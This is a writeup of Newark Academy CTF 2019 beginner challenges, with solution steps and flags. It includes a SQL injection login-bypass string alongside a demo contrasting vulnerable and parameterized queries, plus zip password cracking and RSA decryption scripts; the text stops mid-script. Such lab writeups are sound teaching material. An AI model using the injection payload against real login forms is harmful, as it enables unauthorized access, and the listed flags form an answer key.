【WriteUp】Newark Academy CTF 2019 Writeup

Writeup for Newark Academy CTF 2019

Web Exploitation

Pink Panther

Description:

Rahul loves the Pink Panther. He even made this website:

http://pinkpanther.web.2019.nactf.com

I think he hid a message somewhere on the webpage, but I don’t know where… can you INSPECT and find the message?

https://www.youtube.com/watch?v=2HMSnfeNf8c


Solution:

Open http://pinkpanther.web.2019.nactf.com and view the page source; the message is in there.


Flag:

nactf{1nsp3ct_b3tter_7han_c10us3au}

Scooby Doo

Description:

Kira loves to watch Scooby Doo so much that she made a website about it! She also added a clicker game which looks impossible. Can you use your inspector skills from Pink Panther to reveal the flag?

http://scoobydoo.web.2019.nactf.com


Solution:

View the page source and find <div id="flagContainer">.

Edit the inline CSS on the img tag inside it: just delete the opacity property.

The image is rendered fully transparent; making it opaque reveals it.


Flag:

nactf{ult1m4T3_sh4ggY}

Dexter’s Lab

Description:

Dee Dee,

Please check in on your brother’s lab at dexterslab.web.2019.nactf.com We know his username is Dexter, but we don’t know his password! Maybe you can use a SQL injection?

Mom + Dad


Solution:

This one can be bypassed with a classic "universal password" SQL injection; this is the one I used:

Username: 1'or'1'or'1
Password: anything
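Why that input works, and what stops it, as an added example that is not part of the original writeup: an in-memory SQLite table with a constructed user, a login that splices the input into the SQL text (the pattern the challenge exploits) and a parameterized version of the same query. Table, user and function names are my own, not the challenge's.

```python
import sqlite3

# Constructed sample data: one legitimate user. The password is stored in plain
# text only to keep the demo short; a real application would store a hash.
SAMPLE_USERS = [("Dexter", "s3cret-lab-pass")]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def vulnerable_login(conn, username, password):
    # The input is pasted straight into the SQL text. With username 1'or'1'or'1
    # the WHERE clause becomes
    #   username='1'or'1'or'1' AND password='anything'
    # AND binds tighter than OR, and the bare string '1' is truthy in SQLite,
    # so the middle OR term makes every row match.
    query = ("SELECT username FROM users WHERE username='%s' AND password='%s'"
             % (username, password))
    return conn.execute(query).fetchone() is not None


def safe_login(conn, username, password):
    # Parameterized query: the values travel separately from the SQL text, so
    # quotes inside the input can never change the query's structure.
    query = "SELECT username FROM users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


def demo():
    conn = make_db()
    payload = "1'or'1'or'1"
    return {
        "vulnerable_bypass": vulnerable_login(conn, payload, "anything"),
        "vulnerable_wrong_creds": vulnerable_login(conn, "Dexter", "wrong"),
        "safe_bypass": safe_login(conn, payload, "anything"),
        "safe_real_creds": safe_login(conn, "Dexter", "s3cret-lab-pass"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print("%-24s %s" % (name, result))
```

The same payload that logs in through the concatenated query is just an unusual username to the parameterized one, which is the fix: bind values, never build SQL from user input.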

Flag:

nactf{1nj3c7ion5_ar3_saf3_in_th3_l4b}

Sesame Street

Description:

Surprisingly, The20thDuck loves cookies! He also has no idea how to use php. He accidentally messed up a cookie so it’s only available on the countdown page… Also why use cookies in the first place?

sesamestreet.web.2019.nactf.com


Solution:

First click Countdown and capture the request with Burp; there is a Cookie in it.

Image

Then click Flag and capture that request too; the response says a Cookie is missing.
So add the Cookie obtained a moment ago; now it says the time hasn't arrived yet, so set the time value higher and try again.

Image

That gives the flag.


Flag:

nactf{c000000000ki3s}

Reverse Engineering

Keygen

Description:

Can you figure out what the key to this program is?


Solution:

Based on the routine IDA shows for encoding the flag, I wrote a small program to take a look.

Image

So I wrote the following program:

#include <stdio.h>

/* Repeatedly divide the constant seen in IDA by 62 and print the quotient
   and remainder at each step; the remainders are the base-62 digits of the
   key, least-significant digit first. */
int main(void){
    long long v3 = 0x1371FCAACF98;
    long long chu, yu;  /* chu = quotient, yu = remainder */
    while(v3){
        printf("v3 is %lld\n", v3);
        chu = v3 / 62;
        yu = v3 % 62;
        printf("chu is %lld, yu is %lld\n", chu, yu);
        v3 /= 62;
    }
    return 0;
}

The corresponding output is:

v3 is 21380291284888
chu is 344843407820, yu is 48
v3 is 344843407820
chu is 5561990448, yu is 44
v3 is 5561990448
chu is 89709523, yu is 22
v3 is 89709523
chu is 1446927, yu is 49
v3 is 1446927
chu is 23337, yu is 33
v3 is 23337
chu is 376, yu is 25
v3 is 376
chu is 6, yu is 4
v3 is 6
chu is 0, yu is 6

Then, following the encoding routine in IDA, restore the characters one by one by hand.

The first round has to add 6; of the three if-branches, the only one that allows adding 6 without going out of range is the first, and the rest follow the same way.

The ASCII codes obtained at the end are:

71 69 90 104 120 87 115 119
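The manual restoration above is a base-62 conversion, so it can be checked programmatically. This is an added example, not code from the writeup: it reproduces the remainder sequence the C program prints, maps each digit through the alphabet implied by the three if-branches (0-25 to A-Z, 26-51 to a-z) and decodes the key back to the constant. The 52-61 to 0-9 part of the alphabet is my assumption; no remainder in this challenge reaches it. Function names are mine.

```python
# Base-62 digit alphabet. The A-Z and a-z ranges follow the remainders on the
# page (6 -> 'G', 4 -> 'E', 25 -> 'Z', 33 -> 'h', ...); the '0'-'9' range for
# values 52..61 is an assumption, since no remainder here is that large.
ALPHABET = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
BASE = len(ALPHABET)

# Constant taken from the writeup's IDA output.
V3 = 0x1371FCAACF98


def base62_digits(value):
    """Base-62 remainders of value, least-significant first (the 'yu' column
    printed by the C program on the page)."""
    if value < 0:
        raise ValueError("value must be non-negative")
    digits = []
    while value:
        value, rem = divmod(value, BASE)
        digits.append(rem)
    return digits


def base62_encode(value):
    """Key string: most-significant digit first, each mapped through ALPHABET."""
    if value == 0:
        return ALPHABET[0]
    return "".join(ALPHABET[d] for d in reversed(base62_digits(value)))


def base62_decode(text):
    """Inverse of base62_encode; rejects characters outside the alphabet."""
    value = 0
    for ch in text:
        idx = ALPHABET.find(ch)
        if idx < 0:
            raise ValueError("invalid base-62 character: %r" % ch)
        value = value * BASE + idx
    return value


if __name__ == "__main__":
    key = base62_encode(V3)
    print(key, [ord(ch) for ch in key])
```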

Flag:

nactf{GEZhxWsw}

General Skills

Intro to Flags

Description:

Your flag is nactf{w3lc0m3_t0_th3_m4tr1x}.


Solution:

A freebie sign-in challenge.


Flag:

nactf{w3lc0m3_t0_th3_m4tr1x}

Join the Discord

Description:

Go to the NACTF home page and find the link to the Discord server. A flag will be waiting for you once you join. So will Austin.


Solution:

Join the Discord server and the flag is there; a freebie.


Flag:

nactf{g00d_luck_h4v3_fun}

What the HEX?

Description:

What the HEX man! My friend Elon just posted this message and I have no idea what it means >:( Please help me decode it:

https://twitter.com/kevinmitnick/status/1028080089592815618?lang=en

Leave the text format: no need to add nactf{} or change punctuation/capitalization


Solution:

Far too many replies; it took a while to scroll through them.
The one that matters is the most-upvoted reply, which gives the following; convert the hex to ASCII and you're done:

49 20 77 61 73 2e 20 53 6f 72 72 79 20 74 6f 20 68 61 76 65 20 6d 69 73 73 65 64 20 79 6f 75 2e


Flag:

I was. Sorry to have missed you.

Off-base

Description:

It seems my friend Rohan won’t stop sending cryptic messages and he keeps mumbling something about base 64. Quick! We need to figure out what he is trying to say before he loses his mind…

bmFjdGZ7YV9jaDRuZzNfMGZfYmE1ZX0=


Solution:

Base64 decode; an introductory challenge.


Flag:

nactf{a_ch4ng3_0f_ba5e}

Cat over the wire

Description:

Open up a terminal and connect to the server at shell.2019.nactf.com on port 31242 and get the flag!

Use this netcat command in terminal:

nc shell.2019.nactf.com 31242


Solution:

Paste this command into a Linux terminal and you get the flag directly.


Flag:

nactf{th3_c4ts_0ut_0f_th3_b4g}

Grace’s HashBrowns

Description:

Grace was trying to make some food for her family but she really messed it up. She was trying to make some hashbrowns but instead, she made this:

f5525fc4fc5fdd42a7cf4f65dc27571c

I guess Grace is a really bad cook. But at least she tried to add some md5 sauce.

remember to put the flag in nactf{….}


Solution:

Just look the MD5 up at https://www.somd5.com/.


Flag:

nactf{grak}

Cellular Evolution #0: Bellsprout

Description:

Vikram Loves Bio!

He loves it so much that he started growing Cellular Automata in a little jar of his. He hopes his Cellular Automata can be as strong as HeLa Cells. He has so many cells growing that he decided to hire you to help him with his project. Can you open these files and follow Vikram’s instructions?

Use the flag format nactf{…}


Solution:

Open the jar file and follow the steps: enter E, click parse, then click step.
Then click the OutPat button; an outpattern.txt file is generated in the current directory.
Open the file; its contents are:

1 1 . 1 . . . . 1 1 . 1 1 . . . 1 1 . . . . 1 . 1 1 . . . 1 1 . 1 1 . 1 . 1 1 . 1 1 1 . . 1 1

Delete all the spaces and change every . to 0.
Finally map the bits to letters via their ASCII codes.

Image

This contest has a lot of guess-the-trick challenges…
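The "spaces out, dots to 0, then ASCII" step, as an added example rather than the writeup's own code. Looking at the 47 bits on the page, each letter occupies seven ASCII bits followed by one 0 pad bit, and the final letter is missing its pad bit; that framing is my reading of the data, not something the challenge states. The pattern string is copied from the outpattern.txt contents above; function names are mine.

```python
# Pattern copied from the outpattern.txt contents shown in the writeup.
PATTERN = ("1 1 . 1 . . . . 1 1 . 1 1 . . . 1 1 . . . . 1 . 1 1 . . . 1 1 . "
           "1 1 . 1 . 1 1 . 1 1 1 . . 1 1")


def pattern_to_bits(pattern):
    """Drop the spaces and turn '.' into '0', as the writeup says to."""
    bits = pattern.replace(" ", "").replace(".", "0")
    if set(bits) - {"0", "1"}:
        raise ValueError("pattern contains characters other than 1, . and space")
    return bits


def decode_pattern(pattern, frame=8, width=7):
    """Decode the bit string as ASCII.

    Assumed framing (observed in this challenge's data): every letter is
    `width` ASCII bits followed by a single pad bit, so one `frame`-bit slot
    per letter; the last slot may be missing its pad bit. A slot shorter than
    `width` bits is a truncated symbol and is reported as an error.
    """
    bits = pattern_to_bits(pattern)
    chars = []
    for pos in range(0, len(bits), frame):
        chunk = bits[pos:pos + frame]
        if len(chunk) < width:
            raise ValueError("truncated symbol at bit offset %d" % pos)
        chars.append(chr(int(chunk[:width], 2)))
    return "".join(chars)


if __name__ == "__main__":
    print(pattern_to_bits(PATTERN))
    print(decode_pattern(PATTERN))
```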


Flag:

nactf{hlacks}

Get a GREP #0!

Description:

Vikram was climbing a chunky tree when he decided to hide a flag on one of the leaves. There are 10,000 leaves so there’s no way you can find the right one in time… Can you open up a terminal window and get a grep on the flag?


Solution:

The download is a pile of files; my guess is it's just a bunch of directories created to make you hunt for the flag.
One command in cmd takes care of it:

findstr.exe /s /i "nactf" *.*

Flag:

nactf{v1kram_and_h1s_10000_l3av3s}

Hwang’s Hidden Handiwork

Description:

Hwang was trying to hide secret photos from his parents. His mom found a text file with a secret string and an excel chart which she thinks could help you decrypt it. Can you help uncover Hwang’s Handiwork?

Of course, the nobler of you may choose not to do this problem because you respect Hwang’s privacy. That’s ok, but you won’t get the points.


Solution:

First write a script to decrypt it:

# Substitution table recovered from the Excel chart: Ciphertext[i] decrypts to Plaintext[i]
Plaintext = ["a", "b", "c", "d", "e", "f", "g", "h", "i", "j",
             "k", "l", "m", "n", "o", "p", "q", "r", "s", "t",
             "u", "v", "w", "x", "y", "z", "A", "B", "C", "D",
             "E", "F", "G", "H", "I", "J", "K", "L", "M", "N",
             "O", "P", "Q", "R", "S", "T", "U", "V", "W", "X",
             "Y", "Z", "1", "2", "3", "4", "5", "6", "7", "8",
             "9", "0", ".", "/", "-", "_", "=", ":"]
Ciphertext = ["T", "v", "m", "9", "M", "j", "=", "S", "a", "i",
              "w", "k", "e", "C", "P", "L", "X", "D", "J", "c",
              "8", "h", "f", "_", ".", "t", "I", "B", "q", "R",
              "Q", "Z", "U", "n", "K", "u", "l", "E", "-", "7",
              "6", "g", "N", "p", "/", "s", "Y", "3", ":", "4",
              "o", "A", "x", "H", "G", "1", "b", "F", "W", "2",
              "z", "r", "y", "d", "O", "V", "5", "0"]
decrypt = dict(zip(Ciphertext, Plaintext))

res = ''
with open('./hwangshandiwork.txt', 'r') as fd:
    line = fd.read().strip()
for i in line:
    # characters that are not in the table are skipped, as in the original loop
    if i in decrypt:
        res += decrypt[i]
print(res)

The resulting res is a URL:

https://lh3.googleusercontent.com/vdx0x3krzzyWWSy4ahxBiWJGdIQR9j0W_tQL_ISoorqnAcIKCIu0Czw-ZbjTZ8eAjlwfLC4Dm6QnSPjx5w=w50-h10-rwH

But the trailing =w50-h10-rwH turns out to be useless; with it the page won't even load.
After removing it, the flag image loads directly.


Flag:

nactf{g00gl3_15nt_s3cur3_3n0ugh}

Cellular Evolution #1: Weepinbell

Description:

Apparently, Vikram was not satisfied with your work because he hired a new assistant: Eric. Eric has been doing a great job with managing the cells but he has allergies. Eric sneezed and accidentally messed up the order of the cells. Can you help Eric piece the cells back together?

btw, flag is all lowercase


Solution:

The task is roughly as follows, and it also tells you how to write the conditions:

All cells with value 4 move down and right; after moving they become 3
Cells with value 3 move down and left, becoming 4
Cells with value 1 move up and right, becoming 2
Cells with value 2 move up and left, becoming 1
Cells with value 5 stay unchanged

Just write it exactly as specified.

Image
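The five rules above implemented on a grid, as an added example rather than the writeup's own (image-only) code. The challenge's cell file format is not on the page, so the grid is a constructed list of lists with 0 as an empty cell; what should happen when two cells land on the same square is not specified, so the code reports it as an error instead of silently dropping a cell. Names are mine.

```python
# Movement rules from the challenge text, keyed by the cell's value:
# (row delta, column delta, value after the move). Rows grow downward.
RULES = {
    4: (1, 1, 3),    # down and right, becomes 3
    3: (1, -1, 4),   # down and left, becomes 4
    1: (-1, 1, 2),   # up and right, becomes 2
    2: (-1, -1, 1),  # up and left, becomes 1
}
# 5 stays in place; 0 marks an empty cell (my convention for the sample grid).


def step(grid):
    """Apply one round of moves to a rectangular grid of ints; returns a new grid."""
    rows, cols = len(grid), len(grid[0])
    out = [[0] * cols for _ in range(rows)]
    for r, row in enumerate(grid):
        for c, val in enumerate(row):
            if val == 0:
                continue
            if val == 5:
                nr, nc, nv = r, c, 5
            elif val in RULES:
                dr, dc, nv = RULES[val]
                nr, nc = r + dr, c + dc
            else:
                raise ValueError("unknown cell value %r at (%d, %d)" % (val, r, c))
            if not (0 <= nr < rows and 0 <= nc < cols):
                raise ValueError("cell at (%d, %d) would leave the grid" % (r, c))
            if out[nr][nc] != 0:
                # Unspecified by the challenge: two cells moving onto one square.
                raise ValueError("collision at (%d, %d)" % (nr, nc))
            out[nr][nc] = nv
    return out


# Constructed sample grid (not the challenge's cell file).
SAMPLE = [
    [0, 0, 0, 0, 0],
    [0, 4, 0, 0, 0],
    [0, 0, 0, 3, 0],
    [1, 0, 0, 0, 5],
    [0, 0, 2, 0, 0],
]


if __name__ == "__main__":
    for row in step(SAMPLE):
        print(" ".join(str(v) for v in row))
```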


Flag:

nactf{ib_bio_ftw}

Get a GREP #1!

Description:

Juliet hid a flag among 100,000 dummy ones so I don’t know which one is real! But maybe the format of her flag is predictable? I know sometimes people add random characters to the end of flags… I think she put 7 random vowels at the end of hers. Can you get a GREP on this flag?


Solution:

I'm not very good with regular expressions, so I wrote a rather dumb approach:

strings flag.txt | grep '[aeiou][aeiou][aeiou][aeiou][aeiou][aeiou][aeiou]}$'
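The same filter run over a handful of constructed lines, as an added example that is not from the writeup. It uses the `{7}` repetition the grep above spells out by hand, anchors the pattern to the whole line, and shows which near-misses (seven trailing characters that are not all vowels, seven vowels that are not at the very end) are rejected. The sample lines are made up; flag.txt is not on the page.

```python
import re

# The challenge says the real flag ends in exactly seven random vowels before '}'.
FLAG_RE = re.compile(r"^nactf\{.*[aeiou]{7}\}$")

# Constructed sample lines standing in for flag.txt.
SAMPLE_LINES = [
    "nactf{dummy_flag_qwrtyp}",                                   # trailing chars, no vowels
    "nactf{dummy_flag_aeiou}",                                    # only five vowels
    "nactf{r3gul4r_3xpr3ss10ns_ar3_m0r3_th4n_r3gul4r_euaiooa}",  # seven vowels at the end
    "nactf{another_dummy_aaaaaaa1}",                              # seven vowels, not at the end
    "not a flag at all",
]


def find_candidates(lines):
    """Return the lines that have the expected flag shape."""
    return [line for line in lines if FLAG_RE.match(line.strip())]


if __name__ == "__main__":
    for line in find_candidates(SAMPLE_LINES):
        print(line)
```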

Flag:

nactf{r3gul4r_3xpr3ss10ns_ar3_m0r3_th4n_r3gul4r_euaiooa}

Cellular Evolution #2: VikTreebel

Description:

Thanks to your help, Eric and Vikram fixed their cells. Business is booming, and they’re now a multinational megacorporation! They need bigger cells to meet demand: Eric used the rule “sum8” to evolve his cells to their next stage of evolution! Sum8 sets each cell to the sum of the cells around it (see examples). Eric sent us his evolved cells, but we want to know what they looked like before! Can you turn back time and get the flag?


Solution:


Flag:


SHCALC

Description:

John’s written a handy calculator app - in bash! Too bad it’s not that secure…

Connect at nc shell.2019.nactf.com 31214


Solution:


Flag:


Cellular Evolution #3: BBOB

Description:

Dr. J was teaching Linear Algebra when he decided to buy some of Eric and Vik’s cells! He cultivated the cells, drew a secret flag, and performed one step of “sum8”. Luckily, he learned from Eric’s mistake and added random 0’s, 1’s, and 2’s in the background so nobody can reverse the message. Can you still get the flag?


Solution:


Flag:


Forensics

Least Significant Avenger

Description:

I hate to say it but I think that Hawkeye is probably the Least Significant avenger. Can you find the flag hidden in this picture?


Solution:

An LSB steganography challenge.

Image


Flag:

nactf{h4 wk3y3_15_th3_l34 st_51gn1f1c4nt_b 1t}

The MetaMeme

Description:

Phil sent me this meme and its a little but suspicious. The meme is super meta and it may be even more meta than you think.

Wouldn’t it be really cool if it also had a flag hidden somewhere in it? Well you are in luck because it certainly does!


Solution:

One command does it:

root@lepPwn:~/CTF/work# strings metametametameta.pdf | grep nactf
/Subject (nactf{d4mn_th15_1s_s0_m3t4})

Flag:

nactf{d4mn_th15_1s_s0_m3t4}

My Ears Hurt

Description:

The20thDuck sent me this really annoying audio file. It’s way too high pitched to be his voice. What he is trying to tell me? Maybe its a code; he is the crypto master after all.

You may have to convert file types.

You will need to insert the string into the nactf{…} form before submitting.


Solution:

Resize the waveform so it is easier to read by eye.

Image

From this waveform you can write out the corresponding Morse code:

-../.----/-../..-/-../-----/-/..../.----/...../-.../-.--/..../....-/-./-..
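Decoding that Morse string in code, as an added example rather than the writeup's own work: a letter/digit table, a decoder that splits on the `/` separator used above and refuses unknown symbols, and the wrap into the nactf{…} form the challenge asks for. The Morse string is copied from above; function names are mine.

```python
# International Morse code for letters and digits.
MORSE = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}

# Code as read off the waveform in the writeup; '/' separates letters.
CODE = "-../.----/-../..-/-../-----/-/..../.----/...../-.../-.--/..../....-/-./-.."


def decode_morse(code, sep="/"):
    """Translate a separator-delimited Morse string into letters and digits."""
    letters = []
    for symbol in code.split(sep):
        if not symbol:
            continue  # tolerate a stray or trailing separator
        if symbol not in MORSE:
            raise ValueError("unknown Morse symbol %r" % symbol)
        letters.append(MORSE[symbol])
    return "".join(letters)


def to_flag(text):
    return "nactf{%s}" % text


if __name__ == "__main__":
    print(to_flag(decode_morse(CODE)))
```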

Flag:

nactf{D1DUD0TH15BYH4ND}

Unzip Me

Description:

I stole these files off of The20thDucks’ computer, but it seems he was smart enough to put a password on them. Can you unzip them for me?


Solution:

Cracked with Ziperello.
The second password is rock
The third password is dog

The first one couldn't be brute-forced, so I found a cracking website
https://passwordrecovery.io/zip-file-password-removal/
The first password came out as dictionary


Flag:

nactf{w0w_y0u_unz1pp3d_m3}

Kellen’s Broken File

Description:

Kellen gave in to the temptation and started playing World of Tanks again. He turned the graphics up so high that something broke on his computer!

Kellen is going to lose his HEAD if he can’t open this file. Please help him fix this broken file.


Solution:

The file header 25 50 44 46 2D is missing.
Put it back and the file opens.
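Checking and restoring those five bytes in code, as an added example that is not the writeup's own: 25 50 44 46 2D is the ASCII magic `%PDF-`, and the repair prepends it only when the remaining data starts with the version digits that normally follow it, so an unrelated file is refused rather than blindly patched. The sample bytes are a constructed PDF skeleton with its first five bytes cut off, not the challenge file; function names are mine.

```python
# Magic bytes named in the writeup: 25 50 44 46 2D == b"%PDF-".
PDF_MAGIC = bytes.fromhex("255044462D")


def has_pdf_header(data):
    return data.startswith(PDF_MAGIC)


def looks_like_headerless_pdf(data):
    """True when the data starts with the version tag ("1.4", "1.7", ...) that
    normally follows the magic, i.e. only the magic itself is missing."""
    return len(data) >= 3 and data[0:1].isdigit() and data[1:2] == b"."


def repair_pdf_header(data):
    """Prepend b"%PDF-" when it is missing.

    Assumption (the case on the page): only the five magic bytes were removed.
    Anything that neither has the magic nor starts with a version tag is
    rejected, since prepending the magic would not make it a valid PDF.
    """
    if has_pdf_header(data):
        return data
    if looks_like_headerless_pdf(data):
        return PDF_MAGIC + data
    raise ValueError("file does not look like a PDF with only its magic removed")


# Constructed sample: a minimal PDF skeleton whose first five bytes are gone.
BROKEN = (b"1.4\n"
          b"1 0 obj\n<< /Type /Catalog >>\nendobj\n"
          b"trailer\n<< /Root 1 0 R >>\n%%EOF\n")


if __name__ == "__main__":
    fixed = repair_pdf_header(BROKEN)
    print(fixed[:8])
```

On a real file the same check is the one a forensic triage script runs before calling a parser: compare the first bytes against the expected magic for the claimed extension, and only then decide whether the damage is a stripped header or something deeper.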


Flag:

nactf{kn0w_y0ur_f1l3_h34d3rsjeklwf}

Kellen’s PDF sandwich

Description:

Kellen was playing some more World of Tanks….

He played so much WOT that he worked up an appetite.

Kellen ripped a PDF in half. He then treated these two halves as bread and placed a different PDF on the inside (yummy PDF meat!). That sounds like one good PDF sandwich. PDF on the outside and inside! YUM!


Solution:


Flag:


Filesystem Image

Description:

Put the path to flag.txt together to get the flag! for example, if it was located at ab/cd/ef/gh/ij/flag.txt, your flag would be nactf{abcdefghij}


Solution:

On the Linux desktop, right-click the image file; there is a mount option.

After that, solving it is a single command:

root@lepPwn:/media/root/EAAD-1BA5# find ./* -name flag.txt
./lq/wk/zo/py/hu/flag.txt
root@lepPwn:/media/root/EAAD-1BA5# cat ./lq/wk/zo/py/hu/flag.txt
They'll never find this! HAhahAHahAHAHaHAHAHAA
>:)

Flag:

nactf{lqwkzopyhu}

Phuzzy Photo

Description:

Joyce’s friend just sent her this photo, but it’s really fuzzy. She has no idea what the message says but she thinks she can make out some black text in the middle. She gave the photo to Oligar, but even his super eyes couldn’t read the text. Maybe you can write some code to find the message?

Also, you might have to look at your screen from an angle to see the blurry hidden text

P.S. Joyce’s friend said that part of the message is hidden in every 6th pixel


Solution:


Flag:


File recovery

Description:

Uh oh! Lillian has accidentally deleted everything on her flash drive! Here’s an image of the drive; find the PNG and get the flag.


Solution:

I expected this to be hard, but on Linux the foremost command recovered the flag directly.


Flag:

nactf{f1l3_r3c0v3ry_15_c0ol}

Cryptography

Vyom’s Soggy Croutons

Description:

Vyom was eating a CAESAR salad with a bunch of wet croutons when he sent me this:

ertkw{vk_kl_silkv}

Can you help me decipher his message?


Solution:

A standard Caesar cipher.

Image
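The Caesar step in code, as an added example rather than the writeup's own: a shift function that leaves `{`, `_` and `}` untouched (they are not part of the cipher), a table of all 26 shifts, and a search for the one that produces the nactf{ prefix. The ciphertext is the one from the challenge; function names are mine.

```python
import string

CIPHERTEXT = "ertkw{vk_kl_silkv}"  # from the challenge description
LOWER = string.ascii_lowercase


def caesar_shift(text, shift):
    """Shift every ASCII letter by `shift` places (mod 26); other characters
    such as '{', '_' and '}' pass through unchanged."""
    out = []
    for ch in text:
        if ch.islower():
            out.append(LOWER[(LOWER.index(ch) + shift) % 26])
        elif ch.isupper():
            out.append(LOWER[(LOWER.index(ch.lower()) + shift) % 26].upper())
        else:
            out.append(ch)
    return "".join(out)


def all_shifts(text):
    """Every candidate plaintext, keyed by the shift that produces it."""
    return {s: caesar_shift(text, s) for s in range(26)}


def find_shift(text, prefix="nactf{"):
    """Return (shift, plaintext) for the first shift whose output has the
    known prefix, or None if no shift does."""
    for s, candidate in sorted(all_shifts(text).items()):
        if candidate.startswith(prefix):
            return s, candidate
    return None


if __name__ == "__main__":
    for s, candidate in sorted(all_shifts(CIPHERTEXT).items()):
        print("%2d %s" % (s, candidate))
    print(find_shift(CIPHERTEXT))
```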


Flag:

nactf{et_tu_brute}

Loony Tunes

Description:

Ruthie is very inhumane. She keeps her precious pigs locked up in a pen. I heard that this secret message is the password to unlocking the gate to her PIGPEN. Unfortunately, Ruthie does not want people unlocking the gate so she encoded the password. Please help decrypt this code so that we can free the pigs!

P.S. “_” , “{“ , and “}” are not part of the cipher and should not be changed

P.P.S the flag is all lowercase


Solution:

Pigpen cipher.

Image

Image


Flag:

nactf{th_th_th_thats_all_folks}

Dr. J’s Group Test Randomizer: Board Problem #0

Description:

Dr. J created a fast pseudorandom number generator (prng) to randomly assign pairs for the upcoming group test. Leaf really wants to know the pairs ahead of time… can you help him and predict the next output of Dr. J’s prng? Leaf is pretty sure that Dr. J is using the middle-square method.

nc shell.2019.nactf.com 31425

The server is running the code in class-randomizer-0.c. Look at the function nextRand() to see how numbers are being generated!


Solution:


Flag:


Reversible Sneaky Algorithm #0

Description:

Yavan sent me these really large numbers… what can they mean? He sent me the cipher “c”, the private key “d”, and the public modulus “n”. I also know he converted his message to a number with ascii. For example:

“nactf” –> \x6e61637466 –> 474080310374

Can you help me decrypt his cipher?


Solution:

Being given n, d and c is as good as being given the answer; a script finishes it.

Exploit script:

import gmpy2
import binascii

n = gmpy2.mpz(140971369982728290584003929856637011308685429687969594429997821710108459830116393789723684079062708514036299475509430542212659734507429142853158004794834935174746493412962154796160975546005828130717579132438781804174244070129160649779404165370266408790722528108474736698480388956217393838955462967989235557729)
d = gmpy2.mpz(3210396717872682205420233842120187670754123682946955455494937957220148561826887372494355836977601850209792589944578254791223196877372140862540829182847721214418314564429696694983379689813325142035328881707722441498876726169675843996078221651180111278667814216844121752144791638682520989591783787929482763483)
c = gmpy2.mpz(7597447581111665937753781070914281099248138767561231457808924842755340796976767584904483452403406793827996034815852778012984740739361969304711271790657255334745163889379518040725967970769121270606356380463906882556650693485795903105298437519246733021136433493998710761239540681944709850299154477898517149127)
m = pow(c, d, n)          # m = c^d mod n
m_hex = hex(m)[2:]
if len(m_hex) % 2:        # hex() drops a leading zero nibble; pad to whole bytes
    m_hex = '0' + m_hex
print("ascii:\n%s" % binascii.a2b_hex(m_hex).decode("utf8"))
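The pieces that script relies on, worked through on a toy key so it runs offline, as an added example that is not the writeup's code: the ascii-to-number conversion the challenge describes ("nactf" -> 0x6e61637466 -> 474080310374), its inverse, and textbook RSA encryption and decryption. The key is built from two known Mersenne primes purely so the example needs no prime generator; it is not the challenge's n, d or c. The same unpadded, deterministic encryption is what the next problem (Reversible Sneaky Algorithm #1) turns against itself. Function names are mine; `pow(e, -1, phi)` needs Python 3.8 or later.

```python
# Toy key from two known Mersenne primes (NOT the challenge's numbers).
P = 2**61 - 1
Q = 2**89 - 1
N = P * Q
E = 65537
D = pow(E, -1, (P - 1) * (Q - 1))   # modular inverse of e; Python 3.8+


def msg_to_int(msg):
    """b'nactf' -> 0x6e61637466 -> 474080310374, the conversion the challenge uses."""
    return int.from_bytes(msg, "big")


def int_to_msg(value):
    """Inverse of msg_to_int (no leading zero bytes survive the round trip)."""
    return value.to_bytes((value.bit_length() + 7) // 8, "big")


def rsa_encrypt(m, e, n):
    """Textbook RSA: c = m^e mod n. No padding, so equal messages give equal ciphertexts."""
    if not 0 <= m < n:
        raise ValueError("message must be an integer in [0, n)")
    return pow(m, e, n)


def rsa_decrypt(c, d, n):
    """Textbook RSA: m = c^d mod n, the step the script above performs."""
    return pow(c, d, n)


def round_trip(msg=b"nactf"):
    """Encode, encrypt with the public key, decrypt with the private key, decode."""
    m = msg_to_int(msg)
    c = rsa_encrypt(m, E, N)
    return int_to_msg(rsa_decrypt(c, D, N))


if __name__ == "__main__":
    print(msg_to_int(b"nactf"))
    print(round_trip(b"nactf"))
```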

Flag:

nactf{w3lc0me_t0_numb3r_th30ry}

Super Duper AES

Description:

The Advanced Encryption Standard (AES) has got to go. Spencer just invented the Super Duper Advanced Encryption Standard (SDAES), and it’s 100% unbreakable. AES only performs up to 14 rounds of substitution and permutation, while SDAES performs 10,000. That’s so secure, SDAES doesn’t even use a key!


Solution:


Flag:


Reversible Sneaky Algorithm #1

Description:

Lori decided to implement RSA without any security measures like random padding. Must be deterministic then, huh? Silly goose!

She encrypted a message of the form nactf{****} where the redacted flag is a string of 4 lowercase alphabetical characters. Can you decrypt it?

As in the previous problem, the message is converted to a number by converting ascii to hex.


Solution:

The challenge didn't state this clearly; at first I thought only the part inside nactf{} had to be brute-forced.

In fact the nactf{ and } have to be included when brute-forcing as well.

Brute-force script:

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import itertools
import string
import binascii
import gmpy2

n = gmpy2.mpz(22211149480575639993429030519324903433947913532364781040868963328192510711356813047019777682976897694523708823502748768149007288902843985412808705624398873301639600888468250478096471710461804856036409585519537946352413960371213677893523940481424813184421465313214067723492301317054407961642320909213358344993453825109139928083868146685834149311590508677641684185974469669019522897333475910002506624356655715375691861599282035176111228787146595035293770294934083506588432931535561733381730924617763450268288785249430304809062568532772866407535937947253602671915278827388538023000320823892308918791287865032550658101647)
e = gmpy2.mpz(65537)
